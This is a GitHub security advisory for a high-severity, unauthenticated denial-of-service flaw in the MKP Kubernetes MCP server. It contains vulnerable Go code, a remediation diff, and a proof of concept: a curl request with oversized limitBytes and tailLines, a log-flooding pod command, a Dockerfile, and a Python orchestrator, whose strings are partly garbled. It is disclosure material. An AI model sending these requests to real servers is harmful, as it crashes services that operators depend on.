GHSA-QW5R-PPCG-F8RJ

Vulnerability from github – Published: 2026-07-14 18:09 – Updated: 2026-07-14 18:09
VLAI
Summary
MKP: Unbounded Pod Log Read via Attacker-Controlled `limitBytes`/`tailLines` Causes Memory Exhaustion
Details

Unbounded Pod Log Read via Attacker-Controlled limitBytes/tailLines Causes Memory Exhaustion

Summary

The MKP (Model Context Protocol for Kubernetes) server exposes a get_resource MCP tool that proxies Kubernetes pod log requests. User-supplied limitBytes and tailLines parameters are parsed as unbounded int64 values and forwarded directly to the Kubernetes API. The server then reads the entire returned log stream into an in-memory bytes.Buffer using io.Copy without any application-side size cap. A remote unauthenticated attacker can exploit this to exhaust the MKP server's memory by sending a single crafted tools/call request, leading to process termination (OOM kill) and denial of service. Dynamic reproduction confirmed the MKP process RSS grew from 25.8 MB to 1,179.3 MB (+1,153.4 MB) while handling one request with limitBytes=134217728.

Details

The vulnerability exists in pkg/k8s/subresource.go in the buildPodLogOpts() and defaultGetPodLogs() functions.

Source — unbounded parameter parsing (pkg/k8s/subresource.go:171–181):

// pkg/k8s/subresource.go
defaultLimitBytes := int64(32 * 1024) // 32 KB — only used when parameters map is nil
...
if limitBytes, ok := parameters["limitBytes"]; ok {
    if b, err := strconv.ParseInt(limitBytes, 10, 64); err == nil {
        podLogOpts.LimitBytes = &b  // no upper-bound check
    }
}
if tailLines, ok := parameters["tailLines"]; ok {
    if lines, err := strconv.ParseInt(tailLines, 10, 64); err == nil {
        podLogOpts.TailLines = &lines  // no upper-bound check
    }
}

When the parameters map is non-nil (always true for attacker-supplied input), buildPodLogOpts() is called at pkg/k8s/subresource.go:94–96 and overwrites the 32 KB default entirely. The attacker can therefore supply any positive int64 value (up to 2147483647 or 9223372036854775807) as limitBytes.

Sink — unbounded in-memory copy (pkg/k8s/subresource.go:114–115):

buf := new(bytes.Buffer)
_, err = io.Copy(buf, podLogs)  // entire Kubernetes stream copied into RAM

The stream from Kubernetes is read without limit into a heap-allocated bytes.Buffer. Subsequent JSON serialisation and MCP response wrapping create additional copies, meaning the actual RSS increase is a multiple of the raw log size (observed: ~9×).

Attack path (source → sink):

Step Location Description
1 cmd/server/main.go:30 Server binds to :8080 on all interfaces; no authentication by default
2 pkg/mcp/server.go:131 NewGetResourceTool() registered unconditionally (no --read-write required)
3 pkg/mcp/get_resource.go:28–38 Attacker-controlled parameters map parsed from CallToolRequest
4 pkg/mcp/get_resource.go:76 client.GetResource(..., parameters) called
5 pkg/k8s/subresource.go:32–33 resource=pods + subresource=logs routes into getPodLogs
6 pkg/k8s/subresource.go:171–181 limitBytes / tailLines parsed without upper bound (source)
7 pkg/k8s/subresource.go:114–115 io.Copy(buf, podLogs) loads full stream into bytes.Buffer (sink)

The rate limiter (pkg/ratelimit/config.go:16–17) caps only request frequency (120 req/min) and places no limit on per-request data volume, providing no meaningful mitigation.

Suggested remediation:

+const (
+    maxPodLogTailLines  int64 = 1000
+    maxPodLogLimitBytes int64 = 1024 * 1024  // 1 MB hard cap
+)
+
 buf := new(bytes.Buffer)
-_, err = io.Copy(buf, podLogs)
+limitedLogs := &io.LimitedReader{R: podLogs, N: maxPodLogLimitBytes + 1}
+_, err = io.Copy(buf, limitedLogs)
+if limitedLogs.N == 0 {
+    return nil, fmt.Errorf("pod logs exceed maximum size of %d bytes", maxPodLogLimitBytes)
+}

 if limitBytes, ok := parameters["limitBytes"]; ok {
     if b, err := strconv.ParseInt(limitBytes, 10, 64); err == nil {
+        if b <= 0 || b > maxPodLogLimitBytes {
+            b = maxPodLogLimitBytes
+        }
         podLogOpts.LimitBytes = &b
     }
 }
 if tailLines, ok := parameters["tailLines"]; ok {
     if lines, err := strconv.ParseInt(tailLines, 10, 64); err == nil {
+        if lines <= 0 || lines > maxPodLogTailLines {
+            lines = maxPodLogTailLines
+        }
         podLogOpts.TailLines = &lines
     }
 }

PoC

Prerequisites

  • Docker (for self-contained reproduction)
  • A running Kubernetes cluster with a pod whose logs are large (for real-environment testing)
  • MKP server accessible on port 8080

Option A — Self-contained Docker reproduction (Phase 2 method)

This method uses a mock Kubernetes API that streams 128 MB of log data:

# 1. Clone the repository and enter it
git clone https://github.com/StacklokLabs/mkp.git
cd mkp

# 2. Build the Docker image (build context is the repo root; Dockerfile is in vuln-001/)
docker build -t mkp-vuln-001 -f vuln-001/Dockerfile .

# 3. Run the exploit container — output includes RSS measurements
docker run --rm mkp-vuln-001

Expected output (condensed):

Initial RSS:  26464 kB  ( 25.8 MB)
t+01s: MKP RSS =  383080 kB  ( 374.1 MB)  [in-progress]
t+02s: MKP RSS =  683876 kB  ( 667.8 MB)  [in-progress]
t+03s: MKP RSS =  945008 kB  ( 922.9 MB)  [in-progress]
t+06s: MKP RSS = 1207560 kB  (1179.3 MB)  [in-progress]
Peak RSS: 1207572 kB (1179.3 MB)
Delta RSS: 1181108 kB (1153.4 MB)
VERDICT: CONFIRMED — RSS grew 1153.4 MB (limitBytes=128 MB)

Option B — Real Kubernetes environment (manual)

# 1. Build and start MKP server (default transport: streamable-http on :8080)
git clone https://github.com/StacklokLabs/mkp.git && cd mkp
task build
./build/mkp-server --kubeconfig=/path/to/kubeconfig

# 2. Create a pod that generates large logs
kubectl -n default run logbomb --image=busybox --restart=Never -- \
    sh -c 'yes AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

# Wait ~30 seconds for logs to accumulate, then:

# 3. Send the exploit request
curl -sS http://127.0.0.1:8080/mcp \
    -H 'Content-Type: application/json' \
    -H 'Accept: application/json, text/event-stream' \
    --data '{
      "jsonrpc": "2.0",
      "id": 1,
      "method": "tools/call",
      "params": {
        "name": "get_resource",
        "arguments": {
          "resource_type": "namespaced",
          "group": "",
          "version": "v1",
          "resource": "pods",
          "namespace": "default",
          "name": "logbomb",
          "subresource": "logs",
          "parameters": {
            "tailLines": "999999999",
            "limitBytes": "2147483647"
          }
        }
      }
    }'

Expected observation: MKP process RSS grows rapidly during request handling. With sufficiently large logs or concurrent requests, the process is OOM-killed and the MCP endpoint becomes unavailable.

Impact

This is an unauthenticated remote Denial of Service (DoS) vulnerability affecting any deployment of MKP server accessible over the network.

Who is impacted:

  • Any operator running mkp-server in its default configuration (no --read-write flag required; get_resource is registered by default on :8080 without authentication).
  • Kubernetes clusters whose namespaces contain pods with large accumulated logs (e.g., kube-system workloads in production clusters almost always satisfy this condition).
  • Downstream consumers of the MCP interface who rely on MKP for cluster observability; an attacker can make the entire MKP service unavailable.

A single tools/call request is sufficient to trigger the condition. Because the rate limiter does not cap per-request data volume, even the 120 req/min limit provides no protection: one request with limitBytes=2147483647 (~2 GB) will exhaust memory before any subsequent requests are needed.

No authentication, special privileges, or pre-existing access beyond network reachability of port 8080 is required.

Reproduction artifacts

Dockerfile

# ── Stage 1: Build mkp-server ─────────────────────────────────────────────────
FROM golang:1.25 AS builder

# GOTOOLCHAIN=local prevents Go from trying to download a newer toolchain
# matching the go 1.25.5 directive in go.mod; any Go 1.25.x is sufficient.
ENV GOTOOLCHAIN=local
ENV CGO_ENABLED=0

WORKDIR /src

# Copy the source tree (build con = parent of vuln-001/)
COPY repo/ .

RUN go build -o /mkp-server ./cmd/server

# ── Stage 2: Runtime ─────────────────────────────────────────────────────────
FROM python:3.12-slim

RUN apt-get update && \
 apt-get install -y --no-install-recommends procps curl && \
 rm -rf /var/lib/apt/lists/*

COPY --from=builder /mkp-server /usr/local/bin/mkp-server

COPY vuln-001/mock_k8s_api.py /workspace/mock_k8s_api.py
COPY vuln-001/kubeconfig.yaml /workspace/kubeconfig.yaml
COPY vuln-001/exploit.py /workspace/exploit.py
COPY vuln-001/entrypoint.sh /workspace/entrypoint.sh

RUN chmod +x /workspace/entrypoint.sh

CMD ["/workspace/entrypoint.sh"]

poc.py

#!/usr/bin/env python3
"""
VULN-001 Dynamic Reproduction Orchestrator.

Build: docker build -t mkp-vuln-001 -f vuln-001/Dockerfile .
Run  : docker run --rm mkp-vuln-001

Evidence criterion: MKP RSS grows by ≥ 50 MB while processing a single
tools/call request with limitBytes=134217728 (128 MB), proving that
defaultGetPodLogs() performs an unbounded io.Copy into bytes.Buffer.
"""
import json
import os
import re
import subprocess
import sys
from pathlib import Path

WORK_DIR = Path(__file__).parent.resolve()
REPO_ROOT = WORK_DIR.parent
IMAGE = "mkp-vuln-001"
BUILD_CMD = f"docker build -t {IMAGE} -f vuln-001/Dockerfile ."
RUN_CMD   = f"docker run --rm {IMAGE}"


# ─────────────────────────────────────────────────────────────────────────────
def run_streaming(cmd: str, cwd=None) -> tuple[int, str]:
    """Run a shell command, stream its output, and return (rc, full_output)."""
    proc = subprocess.Popen(
        cmd, shell=True,
        stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
        text=True, cwd=cwd,
    )
    lines = []
    for line in proc.stdout:
        print(line, end='', flush=True)
        lines.append(line)
    proc.wait()
    return proc.returncode, ''.join(lines)


def save_result(result: dict):
    path = WORK_DIR / 'phase2_result.json'
    with open(path, 'w', encoding='utf-8') as f:
        json.dump(result, f, ensure_ascii=False, indent=2)
    print(f"\n[poc] Result saved → {path}")


def parse_evidence(output: str) -> dict:
    ev: dict = {}
    m = re.search(r'Initial RSS\s*:\s*(\d+)', output)
    if m:
        ev['initial_kb'] = int(m.group(1))
        ev['initial_mb'] = ev['initial_kb'] / 1024

    m = re.search(r'Peak RSS\s*:\s*(\d+)', output)
    if m:
        ev['peak_kb'] = int(m.group(1))
        ev['peak_mb'] = ev['peak_kb'] / 1024

    m = re.search(r'Delta RSS\s*:\s*(\d+)\s*kB\s*\(([0-9.]+)\s*MB\)', output)
    if m:
        ev['delta_kb'] = int(m.group(1))
        ev['delta_mb'] = float(m.group(2))
    elif 'peak_kb' in ev and 'initial_kb' in ev:
        ev['delta_kb'] = ev['peak_kb'] - ev['initial_kb']
        ev['delta_mb'] = ev['delta_kb'] / 1024

    m = re.search(r'VERDICT:\s*(CONFIRMED|INCONCLUSIVE)[^\n]*', output)
    if m:
        ev['verdict_line'] = m.group(0)

    return ev


def extract_evidence_block(output: str) -> str:
    """Return the EVIDENCE SUMMARY block, or the last 3000 chars."""
    m = re.search(r'={10,}\nEVIDENCE SUMMARY.*?={10,}', output, re.DOTALL)
    if m:
        return m.group(0)[:3000]
    return output[-3000:]


# ─────────────────────────────────────────────────────────────────────────────
def main():
    print("=" * 60)
    print("VULN-001: Unbounded Pod Log Read — Dynamic Reproduction")
    print("=" * 60)

    os.chdir(REPO_ROOT)

    # ── Docker build ──────────────────────────────────────────────────────────
    print(f"\n[poc] Building Docker image…\n[poc] {BUILD_CMD}\n")
    rc, build_output = run_streaming(BUILD_CMD)
    if rc != 0:
        reason = f"Docker build failed (exit {rc}). text error: {build_output[-800:]}"
        save_result({
            "passed": False,
            "verdict": "FAIL",
            "reason": reason,
            "build_command": BUILD_CMD,
            "run_command": RUN_CMD,
            "poc_command": "python3 vuln-001/poc.py",
            "evidence": build_output[-2000:],
            "artifacts": ["Dockerfile", "poc.py"],
        })
        print(f"\n[poc] FAIL: {reason}")
        return False

    print("\n[poc] Build OK.")

    # ── Docker run ────────────────────────────────────────────────────────────
    print(f"\n[poc] Running exploit container…\n[poc] {RUN_CMD}\n")
    rc, run_output = run_streaming(f"{RUN_CMD} 2>&1")
    print(f"\n[poc] Container exited (code={rc})")

    ev = parse_evidence(run_output)
    delta_mb = ev.get('delta_mb', 0.0)
    print(f"[poc] Parsed evidence: {ev}")

    # ── Verdict ───────────────────────────────────────────────────────────────
    passed = delta_mb >= 50.0

    if passed:
        verdict = "PASS"
        init_mb = ev.get('initial_mb', 0)
        peak_mb = ev.get('peak_mb', 0)
        reason = (
            f"MKP server RSStext {init_mb:.1f} MB → {peak_mb:.1f} MBtext {delta_mb:.1f} MB increasedone. "
            f"the attacker limitBytes=134217728 (128 MB)text tools/call requesttext containswhentextcharacters "
            f"pkg/k8s/subresource.go:114-115text io.Copy(buf, podLogs)text limit text "
            f"bytes.Buffertext 128 MB text streamtext beforetext text thattext dynamicas confirmed."
        )
    else:
        verdict = "INCOMPLETE"
        reason = (
            f"RSS text {delta_mb:.1f} MB — 50 MB criteria text. "
            f"possibletext cause: MCP session initialization failure, 30seconds texttext timeout text exit, "
            f"or Mock API response textreached. container logs text 500characters: {run_output[-500:]}"
        )

    result = {
        "passed": passed,
        "verdict": verdict,
        "reason": reason,
        "build_command": BUILD_CMD,
        "run_command": RUN_CMD,
        "poc_command": "python3 vuln-001/poc.py",
        "evidence": extract_evidence_block(run_output),
        "artifacts": ["Dockerfile", "poc.py"],
    }
    save_result(result)

    print(f"\n[poc] {'PASS' if passed else 'INCOMPLETE'}: {reason}")
    return passed


if __name__ == '__main__':
    ok = main()
    sys.exit(0 if ok else 1)
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/StacklokLabs/mkp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.4.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-50125"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-14T18:09:48Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Unbounded Pod Log Read via Attacker-Controlled `limitBytes`/`tailLines` Causes Memory Exhaustion\n\n### Summary\n\nThe MKP (Model Context Protocol for Kubernetes) server exposes a `get_resource` MCP tool that proxies Kubernetes pod log requests. User-supplied `limitBytes` and `tailLines` parameters are parsed as unbounded `int64` values and forwarded directly to the Kubernetes API. The server then reads the entire returned log stream into an in-memory `bytes.Buffer` using `io.Copy` without any application-side size cap. A remote unauthenticated attacker can exploit this to exhaust the MKP server\u0027s memory by sending a single crafted `tools/call` request, leading to process termination (OOM kill) and denial of service. Dynamic reproduction confirmed the MKP process RSS grew from 25.8 MB to 1,179.3 MB (+1,153.4 MB) while handling one request with `limitBytes=134217728`.\n\n### Details\n\nThe vulnerability exists in `pkg/k8s/subresource.go` in the `buildPodLogOpts()` and `defaultGetPodLogs()` functions.\n\n**Source \u2014 unbounded parameter parsing (`pkg/k8s/subresource.go:171\u2013181`):**\n\n```go\n// pkg/k8s/subresource.go\ndefaultLimitBytes := int64(32 * 1024) // 32 KB \u2014 only used when parameters map is nil\n...\nif limitBytes, ok := parameters[\"limitBytes\"]; ok {\n    if b, err := strconv.ParseInt(limitBytes, 10, 64); err == nil {\n        podLogOpts.LimitBytes = \u0026b  // no upper-bound check\n    }\n}\nif tailLines, ok := parameters[\"tailLines\"]; ok {\n    if lines, err := strconv.ParseInt(tailLines, 10, 64); err == nil {\n        podLogOpts.TailLines = \u0026lines  // no upper-bound check\n    }\n}\n```\n\nWhen the `parameters` map is non-nil (always true for attacker-supplied input), `buildPodLogOpts()` is called at `pkg/k8s/subresource.go:94\u201396` and overwrites the 32 KB default entirely. The attacker can therefore supply any positive `int64` value (up to `2147483647` or `9223372036854775807`) as `limitBytes`.\n\n**Sink \u2014 unbounded in-memory copy (`pkg/k8s/subresource.go:114\u2013115`):**\n\n```go\nbuf := new(bytes.Buffer)\n_, err = io.Copy(buf, podLogs)  // entire Kubernetes stream copied into RAM\n```\n\nThe stream from Kubernetes is read without limit into a heap-allocated `bytes.Buffer`. Subsequent JSON serialisation and MCP response wrapping create additional copies, meaning the actual RSS increase is a multiple of the raw log size (observed: ~9\u00d7).\n\n**Attack path (source \u2192 sink):**\n\n| Step | Location | Description |\n|------|----------|-------------|\n| 1 | `cmd/server/main.go:30` | Server binds to `:8080` on all interfaces; no authentication by default |\n| 2 | `pkg/mcp/server.go:131` | `NewGetResourceTool()` registered unconditionally (no `--read-write` required) |\n| 3 | `pkg/mcp/get_resource.go:28\u201338` | Attacker-controlled `parameters` map parsed from `CallToolRequest` |\n| 4 | `pkg/mcp/get_resource.go:76` | `client.GetResource(..., parameters)` called |\n| 5 | `pkg/k8s/subresource.go:32\u201333` | `resource=pods` + `subresource=logs` routes into `getPodLogs` |\n| 6 | `pkg/k8s/subresource.go:171\u2013181` | `limitBytes` / `tailLines` parsed without upper bound (source) |\n| 7 | `pkg/k8s/subresource.go:114\u2013115` | `io.Copy(buf, podLogs)` loads full stream into `bytes.Buffer` (sink) |\n\nThe rate limiter (`pkg/ratelimit/config.go:16\u201317`) caps only request frequency (120 req/min) and places no limit on per-request data volume, providing no meaningful mitigation.\n\n**Suggested remediation:**\n\n```diff\n+const (\n+    maxPodLogTailLines  int64 = 1000\n+    maxPodLogLimitBytes int64 = 1024 * 1024  // 1 MB hard cap\n+)\n+\n buf := new(bytes.Buffer)\n-_, err = io.Copy(buf, podLogs)\n+limitedLogs := \u0026io.LimitedReader{R: podLogs, N: maxPodLogLimitBytes + 1}\n+_, err = io.Copy(buf, limitedLogs)\n+if limitedLogs.N == 0 {\n+    return nil, fmt.Errorf(\"pod logs exceed maximum size of %d bytes\", maxPodLogLimitBytes)\n+}\n\n if limitBytes, ok := parameters[\"limitBytes\"]; ok {\n     if b, err := strconv.ParseInt(limitBytes, 10, 64); err == nil {\n+        if b \u003c= 0 || b \u003e maxPodLogLimitBytes {\n+            b = maxPodLogLimitBytes\n+        }\n         podLogOpts.LimitBytes = \u0026b\n     }\n }\n if tailLines, ok := parameters[\"tailLines\"]; ok {\n     if lines, err := strconv.ParseInt(tailLines, 10, 64); err == nil {\n+        if lines \u003c= 0 || lines \u003e maxPodLogTailLines {\n+            lines = maxPodLogTailLines\n+        }\n         podLogOpts.TailLines = \u0026lines\n     }\n }\n```\n\n### PoC\n\n**Prerequisites**\n\n- Docker (for self-contained reproduction)\n- A running Kubernetes cluster with a pod whose logs are large (for real-environment testing)\n- MKP server accessible on port 8080\n\n---\n\n**Option A \u2014 Self-contained Docker reproduction (Phase 2 method)**\n\nThis method uses a mock Kubernetes API that streams 128 MB of log data:\n\n```bash\n# 1. Clone the repository and enter it\ngit clone https://github.com/StacklokLabs/mkp.git\ncd mkp\n\n# 2. Build the Docker image (build context is the repo root; Dockerfile is in vuln-001/)\ndocker build -t mkp-vuln-001 -f vuln-001/Dockerfile .\n\n# 3. Run the exploit container \u2014 output includes RSS measurements\ndocker run --rm mkp-vuln-001\n```\n\nExpected output (condensed):\n\n```\nInitial RSS:  26464 kB  ( 25.8 MB)\nt+01s: MKP RSS =  383080 kB  ( 374.1 MB)  [in-progress]\nt+02s: MKP RSS =  683876 kB  ( 667.8 MB)  [in-progress]\nt+03s: MKP RSS =  945008 kB  ( 922.9 MB)  [in-progress]\nt+06s: MKP RSS = 1207560 kB  (1179.3 MB)  [in-progress]\nPeak RSS: 1207572 kB (1179.3 MB)\nDelta RSS: 1181108 kB (1153.4 MB)\nVERDICT: CONFIRMED \u2014 RSS grew 1153.4 MB (limitBytes=128 MB)\n```\n\n---\n\n**Option B \u2014 Real Kubernetes environment (manual)**\n\n```bash\n# 1. Build and start MKP server (default transport: streamable-http on :8080)\ngit clone https://github.com/StacklokLabs/mkp.git \u0026\u0026 cd mkp\ntask build\n./build/mkp-server --kubeconfig=/path/to/kubeconfig\n\n# 2. Create a pod that generates large logs\nkubectl -n default run logbomb --image=busybox --restart=Never -- \\\n    sh -c \u0027yes AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u0027\n\n# Wait ~30 seconds for logs to accumulate, then:\n\n# 3. Send the exploit request\ncurl -sS http://127.0.0.1:8080/mcp \\\n    -H \u0027Content-Type: application/json\u0027 \\\n    -H \u0027Accept: application/json, text/event-stream\u0027 \\\n    --data \u0027{\n      \"jsonrpc\": \"2.0\",\n      \"id\": 1,\n      \"method\": \"tools/call\",\n      \"params\": {\n        \"name\": \"get_resource\",\n        \"arguments\": {\n          \"resource_type\": \"namespaced\",\n          \"group\": \"\",\n          \"version\": \"v1\",\n          \"resource\": \"pods\",\n          \"namespace\": \"default\",\n          \"name\": \"logbomb\",\n          \"subresource\": \"logs\",\n          \"parameters\": {\n            \"tailLines\": \"999999999\",\n            \"limitBytes\": \"2147483647\"\n          }\n        }\n      }\n    }\u0027\n```\n\n**Expected observation:** MKP process RSS grows rapidly during request handling. With sufficiently large logs or concurrent requests, the process is OOM-killed and the MCP endpoint becomes unavailable.\n\n### Impact\n\nThis is an **unauthenticated remote Denial of Service (DoS)** vulnerability affecting any deployment of MKP server accessible over the network.\n\n**Who is impacted:**\n\n- Any operator running `mkp-server` in its default configuration (no `--read-write` flag required; `get_resource` is registered by default on `:8080` without authentication).\n- Kubernetes clusters whose namespaces contain pods with large accumulated logs (e.g., `kube-system` workloads in production clusters almost always satisfy this condition).\n- Downstream consumers of the MCP interface who rely on MKP for cluster observability; an attacker can make the entire MKP service unavailable.\n\nA single `tools/call` request is sufficient to trigger the condition. Because the rate limiter does not cap per-request data volume, even the 120 req/min limit provides no protection: one request with `limitBytes=2147483647` (~2 GB) will exhaust memory before any subsequent requests are needed.\n\nNo authentication, special privileges, or pre-existing access beyond network reachability of port 8080 is required.\n\n### Reproduction artifacts\n\n#### `Dockerfile`\n\n```dockerfile\n# \u2500\u2500 Stage 1: Build mkp-server \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nFROM golang:1.25 AS builder\n\n# GOTOOLCHAIN=local prevents Go from trying to download a newer toolchain\n# matching the go 1.25.5 directive in go.mod; any Go 1.25.x is sufficient.\nENV GOTOOLCHAIN=local\nENV CGO_ENABLED=0\n\nWORKDIR /src\n\n# Copy the source tree (build con = parent of vuln-001/)\nCOPY repo/ .\n\nRUN go build -o /mkp-server ./cmd/server\n\n# \u2500\u2500 Stage 2: Runtime \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nFROM python:3.12-slim\n\nRUN apt-get update \u0026\u0026 \\\n apt-get install -y --no-install-recommends procps curl \u0026\u0026 \\\n rm -rf /var/lib/apt/lists/*\n\nCOPY --from=builder /mkp-server /usr/local/bin/mkp-server\n\nCOPY vuln-001/mock_k8s_api.py /workspace/mock_k8s_api.py\nCOPY vuln-001/kubeconfig.yaml /workspace/kubeconfig.yaml\nCOPY vuln-001/exploit.py /workspace/exploit.py\nCOPY vuln-001/entrypoint.sh /workspace/entrypoint.sh\n\nRUN chmod +x /workspace/entrypoint.sh\n\nCMD [\"/workspace/entrypoint.sh\"]\n```\n\n#### `poc.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nVULN-001 Dynamic Reproduction Orchestrator.\n\nBuild: docker build -t mkp-vuln-001 -f vuln-001/Dockerfile .\nRun  : docker run --rm mkp-vuln-001\n\nEvidence criterion: MKP RSS grows by \u2265 50 MB while processing a single\ntools/call request with limitBytes=134217728 (128 MB), proving that\ndefaultGetPodLogs() performs an unbounded io.Copy into bytes.Buffer.\n\"\"\"\nimport json\nimport os\nimport re\nimport subprocess\nimport sys\nfrom pathlib import Path\n\nWORK_DIR = Path(__file__).parent.resolve()\nREPO_ROOT = WORK_DIR.parent\nIMAGE = \"mkp-vuln-001\"\nBUILD_CMD = f\"docker build -t {IMAGE} -f vuln-001/Dockerfile .\"\nRUN_CMD   = f\"docker run --rm {IMAGE}\"\n\n\n# \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ndef run_streaming(cmd: str, cwd=None) -\u003e tuple[int, str]:\n    \"\"\"Run a shell command, stream its output, and return (rc, full_output).\"\"\"\n    proc = subprocess.Popen(\n        cmd, shell=True,\n        stdout=subprocess.PIPE, stderr=subprocess.STDOUT,\n        text=True, cwd=cwd,\n    )\n    lines = []\n    for line in proc.stdout:\n        print(line, end=\u0027\u0027, flush=True)\n        lines.append(line)\n    proc.wait()\n    return proc.returncode, \u0027\u0027.join(lines)\n\n\ndef save_result(result: dict):\n    path = WORK_DIR / \u0027phase2_result.json\u0027\n    with open(path, \u0027w\u0027, encoding=\u0027utf-8\u0027) as f:\n        json.dump(result, f, ensure_ascii=False, indent=2)\n    print(f\"\\n[poc] Result saved \u2192 {path}\")\n\n\ndef parse_evidence(output: str) -\u003e dict:\n    ev: dict = {}\n    m = re.search(r\u0027Initial RSS\\s*:\\s*(\\d+)\u0027, output)\n    if m:\n        ev[\u0027initial_kb\u0027] = int(m.group(1))\n        ev[\u0027initial_mb\u0027] = ev[\u0027initial_kb\u0027] / 1024\n\n    m = re.search(r\u0027Peak RSS\\s*:\\s*(\\d+)\u0027, output)\n    if m:\n        ev[\u0027peak_kb\u0027] = int(m.group(1))\n        ev[\u0027peak_mb\u0027] = ev[\u0027peak_kb\u0027] / 1024\n\n    m = re.search(r\u0027Delta RSS\\s*:\\s*(\\d+)\\s*kB\\s*\\(([0-9.]+)\\s*MB\\)\u0027, output)\n    if m:\n        ev[\u0027delta_kb\u0027] = int(m.group(1))\n        ev[\u0027delta_mb\u0027] = float(m.group(2))\n    elif \u0027peak_kb\u0027 in ev and \u0027initial_kb\u0027 in ev:\n        ev[\u0027delta_kb\u0027] = ev[\u0027peak_kb\u0027] - ev[\u0027initial_kb\u0027]\n        ev[\u0027delta_mb\u0027] = ev[\u0027delta_kb\u0027] / 1024\n\n    m = re.search(r\u0027VERDICT:\\s*(CONFIRMED|INCONCLUSIVE)[^\\n]*\u0027, output)\n    if m:\n        ev[\u0027verdict_line\u0027] = m.group(0)\n\n    return ev\n\n\ndef extract_evidence_block(output: str) -\u003e str:\n    \"\"\"Return the EVIDENCE SUMMARY block, or the last 3000 chars.\"\"\"\n    m = re.search(r\u0027={10,}\\nEVIDENCE SUMMARY.*?={10,}\u0027, output, re.DOTALL)\n    if m:\n        return m.group(0)[:3000]\n    return output[-3000:]\n\n\n# \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ndef main():\n    print(\"=\" * 60)\n    print(\"VULN-001: Unbounded Pod Log Read \u2014 Dynamic Reproduction\")\n    print(\"=\" * 60)\n\n    os.chdir(REPO_ROOT)\n\n    # \u2500\u2500 Docker build \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n    print(f\"\\n[poc] Building Docker image\u2026\\n[poc] {BUILD_CMD}\\n\")\n    rc, build_output = run_streaming(BUILD_CMD)\n    if rc != 0:\n        reason = f\"Docker build failed (exit {rc}). text error: {build_output[-800:]}\"\n        save_result({\n            \"passed\": False,\n            \"verdict\": \"FAIL\",\n            \"reason\": reason,\n            \"build_command\": BUILD_CMD,\n            \"run_command\": RUN_CMD,\n            \"poc_command\": \"python3 vuln-001/poc.py\",\n            \"evidence\": build_output[-2000:],\n            \"artifacts\": [\"Dockerfile\", \"poc.py\"],\n        })\n        print(f\"\\n[poc] FAIL: {reason}\")\n        return False\n\n    print(\"\\n[poc] Build OK.\")\n\n    # \u2500\u2500 Docker run \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n    print(f\"\\n[poc] Running exploit container\u2026\\n[poc] {RUN_CMD}\\n\")\n    rc, run_output = run_streaming(f\"{RUN_CMD} 2\u003e\u00261\")\n    print(f\"\\n[poc] Container exited (code={rc})\")\n\n    ev = parse_evidence(run_output)\n    delta_mb = ev.get(\u0027delta_mb\u0027, 0.0)\n    print(f\"[poc] Parsed evidence: {ev}\")\n\n    # \u2500\u2500 Verdict 